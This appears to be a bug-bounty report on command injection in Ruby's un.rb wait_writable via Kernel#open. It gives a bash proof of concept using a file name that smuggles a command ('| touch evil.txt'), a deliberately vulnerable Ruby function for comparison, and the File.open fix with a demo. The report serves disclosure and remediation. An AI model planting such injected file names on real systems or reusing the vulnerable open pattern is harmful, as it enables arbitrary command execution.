OS Command Injection in '/lib/un.rb -- Utilities to replace common UNIX commands in Makefiles etc'
Medium
Vulnerability Details
If the `wait_writable` command receives a list of files and one of the file names starts with a pipe character followed by a command, that command is executed: `un.rb` passes the name to `Kernel#open`, which treats a leading `|` as a process to spawn rather than a file to open.
# PoC
```bash
$ touch \|\ touch\ evil.txt
$ ls
'| touch evil.txt'
$ ruby -run -e wait_writable -- -w 1 -v *
$ ls
evil.txt '| touch evil.txt'
```
The vulnerability has the same severity as https://hackerone.com/reports/651518, and the fix is the same: `open` -> `File.open`.
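The `open` -> `File.open` fix in a runnable form, as an added example written for this page and not code from Ruby's `un.rb`: `wait_writable_fixed` is a simplified stand-in for the `wait_writable` retry loop (the `attempts` and `delay` parameters are assumptions, not `un.rb` options), and `demo_no_command_execution` feeds it the PoC's file name inside a temporary directory to show that `File.open` creates a file literally named `| touch evil.txt` and spawns nothing.

```ruby
require 'tmpdir'

# Vulnerable shape (for comparison only, never call it with untrusted names):
# Kernel#open interprets a leading "|" as a command to spawn, so a file
# name such as "| touch evil.txt" runs `touch evil.txt` instead of opening a file.
def wait_writable_vulnerable(paths)
  paths.map do |path|
    open(path, "wb") {}          # Kernel#open: "|cmd" => subprocess
    [path, :writable]
  end
end

# Fixed shape: File.open always treats its argument as a file name, so the
# same hostile input is just an oddly named file. Retries on EACCES mimic the
# wait-until-writable behaviour; `attempts` and `delay` are assumed parameters.
def wait_writable_fixed(paths, attempts: 3, delay: 0.01)
  paths.map do |path|
    tries = 0
    begin
      File.open(path, "wb") {}   # File.open never interprets "|cmd"
      [path, :writable]
    rescue Errno::EACCES
      tries += 1
      if tries < attempts
        sleep delay
        retry
      end
      [path, :not_writable]
    end
  end
end

# Runs the fixed variant against the PoC's file name in a scratch directory
# and reports what ended up on disk. Expected: the literal "| touch evil.txt"
# file exists and no "evil.txt" was created, i.e. no command ran.
def demo_no_command_execution
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      hostile = "| touch evil.txt"   # constructed input, copied from the PoC
      result = wait_writable_fixed([hostile])
      {
        result: result,
        literal_file_created: File.exist?(hostile),
        evil_created: File.exist?("evil.txt"),
      }
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  p demo_no_command_execution
end
```

The only line that differs between the two functions is the open call; everything else (the retry loop, the verbose reporting that the real command supports) is unaffected by the fix, which is why the change is safe to apply mechanically wherever `Kernel#open` receives a caller-controlled name.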
## Impact
An attacker can use this problem to execute arbitrary commands in environments that use the Ruby core utilities (`ruby -run`) on file names they control.
Report Stats
- Report ID: 1158824
- State: Closed
- Substate: informative
- Upvotes: 4